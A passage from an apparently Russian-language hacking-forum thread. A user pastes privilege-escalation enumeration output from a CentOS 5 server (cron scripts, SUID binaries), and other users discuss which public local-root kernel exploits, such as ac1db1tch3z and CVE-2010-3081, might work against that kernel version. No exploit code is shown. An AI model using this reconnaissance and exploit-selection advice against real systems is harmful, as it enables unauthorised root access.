4408045 4 -rwxr-xr-x 1 root root 282 Jun 2 2008 /etc/cron.daily/yum.check-update
32325735 4 -rwxr-xr-x 1 root root 150 Mar 20 16:12 /etc/cron.daily/freshclam
4408042 4 -rwxr-xr-x 1 root root 2181 Jun 21 2006 /etc/cron.daily/prelink
4407924 0 -rw-r--r-- 1 root root 0 May 16 2008 /etc/cron.deny
4408018 4 -rwxr-xr-x 1 root root 414 May 30 2012 /etc/cron.weekly/makewhatis.cron
32391237 4 -rwxr-xr-x 1 root root 2843 Jan 9 2013 /etc/cron.weekly/99-raid-check
4407925 4 -rw-r--r-- 1 root root 500 Jan 11 2011 /etc/crontab
[+]List of USER CRON tabs:
=====================================
== READ cronfile: /etc/cron.daily/tmpwatch
flags=-umc
/usr/sbin/tmpwatch "$flags" -x /tmp/.X11-unix -x /tmp/.XIM-unix \
-x /tmp/.font-unix -x /tmp/.ICE-unix -x /tmp/.Test-unix \
-X '/tmp/hsperfdata_*' 240 /tmp
/usr/sbin/tmpwatch "$flags" 720 /var/tmp
for d in /var/{cache/man,catman}/{cat?,X11R6/cat?,local/cat?}; do
if [ -d "$d" ]; then
/usr/sbin/tmpwatch "$flags" -f 720 "$d"
fi
done
== end of /etc/cron.daily/tmpwatch
=====================================
=====================================
== READ cronfile: /etc/cron.daily/logrotate
#!/bin/sh
/usr/sbin/logrotate /etc/logrotate.conf
EXITVALUE=$?
if [ $EXITVALUE != 0 ]; then
/usr/bin/logger -t logrotate "ALERT exited abnormally with [$EXITVALUE]"
fi
exit 0
== end of /etc/cron.daily/logrotate
=====================================
=====================================
== READ cronfile: /etc/cron.daily/makewhatis.cron
#!/bin/bash
LOCKFILE=/var/lock/makewhatis.lock
# the lockfile is not meant to be perfect, it's just in case the
# two makewhatis cron scripts get run close to each other to keep
# them from stepping on each other's toes. The worst that will
# happen is that they will temporarily corrupt the database...
[ -f $LOCKFILE ] && exit 0
trap "{ rm -f $LOCKFILE ; exit 255; }" EXIT
touch $LOCKFILE
makewhatis -u -w
exit 0
== end of /etc/cron.daily/makewhatis.cron
=====================================
=====================================
== READ cronfile: /etc/cron.daily/mlocate.cron
#!/bin/sh
nodevs=$(< /proc/filesystems awk '$1 == "nodev" { print $2 }')
renice +19 -p $$ >/dev/null 2>&1
/usr/bin/updatedb -f "$nodevs"
== end of /etc/cron.daily/mlocate.cron
=====================================
=====================================
== READ cronfile: /etc/cron.daily/rpm
#!/bin/sh
tmpfile=`/bin/mktemp /var/log/rpmpkgs.XXXXXXXXX` || exit 1
/bin/rpm -qa --qf '%{name}-%{version}-%{release}.%{arch}.rpm\n' 2>&1 \
| /bin/sort > "$tmpfile"
if [ ! -s "$tmpfile" ]; then
rm -f "$tmpfile"
exit 1
fi
/bin/mv "$tmpfile" /var/log/rpmpkgs
/bin/chmod 0644 /var/log/rpmpkgs
== end of /etc/cron.daily/rpm
=====================================
=====================================
== READ cronfile: /etc/cron.daily/yum.check-update
#!/bin/bash
Mail="root"
List=`mktemp /tmp/yum.check-update.XXXXXXXXXX`
# Clean up when done or when aborting.
trap "rm -f $List" 0 1 2 3 15
yum -R 10 -e 0 -d 0 check-update >$List 2>&1
if [ $? -ne 0 ]; then
mail -s "yum updates available: `hostname`" $Mail < $List
fi
== end of /etc/cron.daily/yum.check-update
=====================================
=====================================
== READ cronfile: /etc/cron.daily/freshclam
#!/bin/sh
### A simple update script for the clamav virus database.
### This could as well be replaced by a SysV script.
/usr/bin/freshclam --quiet
== end of /etc/cron.daily/freshclam
=====================================
=====================================
== READ cronfile: /etc/cron.daily/prelink
#!/bin/sh
. /etc/sysconfig/prelink
renice +19 -p $$ >/dev/null 2>&1
if [ "$PRELINKING" != yes ]; then
if [ -f /etc/prelink.cache ]; then
echo /usr/sbin/prelink -uav > /var/log/prelink/prelink.log
/usr/sbin/prelink -uav >> /var/log/prelink/prelink.log 2>&1 \
|| echo Prelink failed with return value $? >> /var/log/prelink/prelink.log
rm -f /etc/prelink.cache
# Restart init if needed
[ -n "$(find `ldd /sbin/init | awk 'NF == 4 { print $3 }'` /sbin/init -ctime -1 2>/dev/null )" ] && /sbin/telinit u
fi
exit 0
fi
if [ ! -f /etc/prelink.cache -o -f /var/lib/misc/prelink.force ] \
|| grep -q '^prelink-ELF0.[0-2]' /etc/prelink.cache; then
# If cache does not exist or is from older prelink versions or
# if we were asked to explicitely, force full prelinking
rm -f /etc/prelink.cache /var/lib/misc/prelink.force
PRELINK_OPTS="$PRELINK_OPTS -f"
date > /var/lib/misc/prelink.full
cp -a /var/lib/misc/prelink.{full,quick}
elif [ -n "$PRELINK_FULL_TIME_INTERVAL" \
-a "`find /var/lib/misc/prelink.full -mtime -${PRELINK_FULL_TIME_INTERVAL} 2>/dev/null`" \
= /var/lib/misc/prelink.full ]; then
# If no more than PRELINK_NONRPM_CHECK_INTERVAL days elapsed from last prelink
# (be it full or quick) and no packages have been upgraded via rpm since then,
# don't do anything.
[ "`find /var/lib/misc/prelink.quick -mtime -${PRELINK_NONRPM_CHECK_INTERVAL:-7} 2>/dev/null`" \
-a -f /var/lib/rpm/Packages \
-a /var/lib/rpm/Packages -ot /var/lib/misc/prelink.quick ] && exit 0
date > /var/lib/misc/prelink.quick
# If prelink without -q has been run in the last
# PRELINK_FULL_TIME_INTERVAL days, just use quick mode
PRELINK_OPTS="$PRELINK_OPTS -q"
else
date > /var/lib/misc/prelink.full
cp -a /var/lib/misc/prelink.{full,quick}
fi
echo /usr/sbin/prelink -av $PRELINK_OPTS > /var/log/prelink/prelink.log
/usr/sbin/prelink -av $PRELINK_OPTS >> /var/log/prelink/prelink.log 2>&1 \
|| echo Prelink failed with return value $? >> /var/log/prelink/prelink.log
# Restart init if needed
[ -n "$(find `ldd /sbin/init | awk 'NF == 4 { print $3 }'` /sbin/init -ctime -1 2>/dev/null )" ] && /sbin/telinit u
exit 0
== end of /etc/cron.daily/prelink
=====================================
=====================================
== /etc/cron.deny EMPTY
=====================================
=====================================
== READ cronfile: /etc/cron.weekly/makewhatis.cron
#!/bin/bash
LOCKFILE=/var/lock/makewhatis.lock
# the lockfile is not meant to be perfect, it's just in case the
# two makewhatis cron scripts get run close to each other to keep
# them from stepping on each other's toes. The worst that will
# happen is that they will temporarily corrupt the database...
[ -f $LOCKFILE ] && exit 0
trap "{ rm -f $LOCKFILE; exit 255; }" EXIT
touch $LOCKFILE
makewhatis -w
exit 0
== end of /etc/cron.weekly/makewhatis.cron
=====================================
=====================================
== READ cronfile: /etc/cron.weekly/99-raid-check
#!/bin/bash
#
# This script reads it's configuration from /etc/sysconfig/raid-check
# Please use that file to enable/disable this script or to set the
# type of check you wish performed.
# We might be on a kernel with no raid support at all, exit if so
[ -f /proc/mdstat ] || exit 0
# and exit if we haven't been set up properly
[ -f /etc/sysconfig/raid-check ] || exit 0
. /etc/sysconfig/raid-check
[ "$ENABLED" != "yes" ] && exit 0
case "$CHECK" in
check) ;;
repair) ;;
*) exit 0;;
esac
active_list=`grep "^md.*: active" /proc/mdstat | cut -f 1 -d ' '`
[ -z "$active_list" ] && exit 0
dev_list=""
check_list=""
devnum=0
for dev in $active_list; do
echo $SKIP_DEVS | grep -w $dev >/dev/null 2>&1 && continue
if [ -f /sys/block/$dev/md/sync_action ]; then
# Only perform the checks on idle, healthy arrays, but delay
# actually writing the check field until the next loop so we
# don't switch currently idle arrays to active, which happens
# when two or more arrays are on the same physical disk
array_state=`cat /sys/block/$dev/md/array_state`
sync_action=`cat /sys/block/$dev/md/sync_action`
if [ "$array_state" = clean -o "$array_state" = active ] && [ "$sync_action" = idle ]; then
ck=""
echo $REPAIR_DEVS | grep -w $dev >/dev/null 2>&1 && ck="repair"
echo $CHECK_DEVS | grep -w $dev >/dev/null 2>&1 && ck="check"
[ -z "$ck" ] && ck=$CHECK
dev_list="$dev_list $dev"
check[$devnum]=$ck
let devnum++
[ "$ck" = "check" ] && check_list="$check_list $dev"
fi
fi
done
[ -z "$dev_list" ] && exit 0
devnum=0
for dev in $dev_list; do
echo "${check[$devnum]}" > /sys/block/$dev/md/sync_action
let devnum++
done
[ -z "$check_list" ] && exit 0
checking=1
while [ $checking -ne 0 ]
do
sleep 60
checking=0
for dev in $check_list; do
sync_action=`cat /sys/block/$dev/md/sync_action`
if [ "$sync_action" != "idle" ]; then
checking=1
fi
done
done
for dev in $check_list; do
mismatch_cnt=`cat /sys/block/$dev/md/mismatch_cnt`
# Due to the fact that raid1 writes in the kernel are unbuffered,
# a raid1 array can have non-0 mismatch counts even when the
# array is healthy. These non-0 counts will only exist in
# transient data areas where they don't pose a problem. However,
# since we can't tell the difference between a non-0 count that
# is just in transient data or a non-0 count that signifies a
# real problem, simply don't check the mismatch_cnt on raid1
# devices as it's providing far too many false positives. But by
# leaving the raid1 device in the check list and performing the
# check, we still catch and correct any bad sectors there might
# be in the device.
raid_lvl=`cat /sys/block/$dev/md/level`
if [ "$mismatch_cnt" -ne 0 -a "$raid_lvl" != "raid1" ]; then
echo "WARNING: mismatch_cnt is not 0 on /dev/$dev"
fi
done
== end of /etc/cron.weekly/99-raid-check
=====================================
=====================================
== READ cronfile: /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/
# run-parts
01 * * * * root run-parts /etc/cron.hourly
02 4 * * * root run-parts /etc/cron.daily
22 4 * * 0 root run-parts /etc/cron.weekly
42 4 1 * * root run-parts /etc/cron.monthly
##-- Spamooborona cron entries start
#10 5 * * * root /etc/spamooborona/scripts/cron_spamstat
#*/20 * * * * root /etc/spamooborona/scripts/cron_rul
#20 10 * * * root /etc/spamooborona/scripts/cron_notify
##-- Spamooborona cron entries end
== end of /etc/crontab
=====================================
**************************************************
* FIND suid files *
* *
**************************************************
-rws--x--x 1 vcsa root 7.7K Nov 11 2007 /usr/libexec/mc/cons.saver
-rwsr-xr-x 1 root root 174K Feb 22 2012 /usr/libexec/openssh/ssh-keysign
-rws--x--x 1 root root 18K Nov 8 2012 /usr/bin/chfn
---s--x--x 2 root root 174K Mar 8 20:06 /usr/bin/sudoedit
-rwsr-xr-x 1 root root 25K Jan 9 2013 /usr/bin/newgrp
-rwsr-xr-x 1 root root 23K Aug 11 2010 /usr/bin/passwd
---s--x--x 2 root root 174K Mar 8 20:06 /usr/bin/sudo
-rws--x--x 1 root root 19K Nov 8 2012 /usr/bin/chsh
-rwsr-xr-x 1 root root 43K Jan 27 2010 /usr/bin/at
-rwsr-xr-x 1 root root 50K Jan 9 2013 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 47K Jan 9 2013 /usr/bin/chage
-rwsr-sr-x 1 root root 303K Feb 23 2012 /usr/bin/crontab
-rwsr-sr-x 1 root zabbix 29K Jul 30 2007 /usr/sbin/fping
-r-s--x--- 1 root apache 12K Jun 26 18:38 /usr/sbin/suexec
-rwsr-xr-x 1 root root 30K Jul 30 2007 /usr/sbin/fping6
-rws--x--x 1 root root 33K Feb 27 2009 /usr/sbin/userhelper
-rwsr-xr-x 1 root root 6.8K Aug 9 2012 /usr/sbin/usernetctl
-rwsr-x--- 1 root dbus 45K Aug 11 2011 /lib/dbus-1/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 59K Nov 8 2012 /bin/mount
-rwsr-xr-x 1 root root 35K Sep 26 2009 /bin/ping
-rwsr-xr-x 1 root root 24K Mar 21 2012 /bin/su
-rwsr-xr-x 1 root root 40K Nov 8 2012 /bin/umount
-rwsr-xr-x 1 root root 31K Sep 26 2009 /bin/ping6
-rwsr-xr-x 1 root root 72K Jan 9 2013 /sbin/mount.nfs4
-rwsr-xr-x 1 root root 19K Jan 9 2013 /sbin/unix_chkpwd
-rwsr-xr-x 1 root root 72K Jan 9 2013 /sbin/umount.nfs4
-rwsr-xr-x 1 root root 72K Jan 9 2013 /sbin/umount.nfs
-rwsr-xr-x 1 root root 13K Jan 9 2013 /sbin/pam_timestamp_check
-rwsr-xr-x 1 root root 72K Jan 9 2013 /sbin/mount.nfs
[!] ALL JOBS DONE, Have a good day!
__________________
Roamer, wanderer Nomad, vagabond Call me what you will (c) Metallica |
|
|
|
|
04.08.2013, 04:10
|
#918 |
|
|
На заборе тоже [censored] написано, а там доски. Выложи хотя бы видео, может узнаем сплойт. Я давно слышал про сплойт под -194.el5 но до сих пор в паблике тишина.
|
|
|
|
|
05.08.2013, 18:16
|
#919 |
|
емнип ac1db1tch3z работает до 2.6.18-194.15.2
194.32 не пробивается |
|
|
|
|
|
05.08.2013, 18:22
|
#920 |
Регистрация: 05.07.2010
Сообщений: 1,243
|
ac1db1tch3z вроде работает только 2.6.27+, не?
и потом там CVE-2010-3081 - Published: 2010-09-16 явно под 2011 не пойдет dbus можно посмотреть, но нужен пароль юзера (любого) |
|
|
|
|
| Опции темы | Поиск в этой теме |
| Опции просмотра | |
Линейный вид
|
|
Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd. Перевод: zCarot
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd. Перевод: zCarot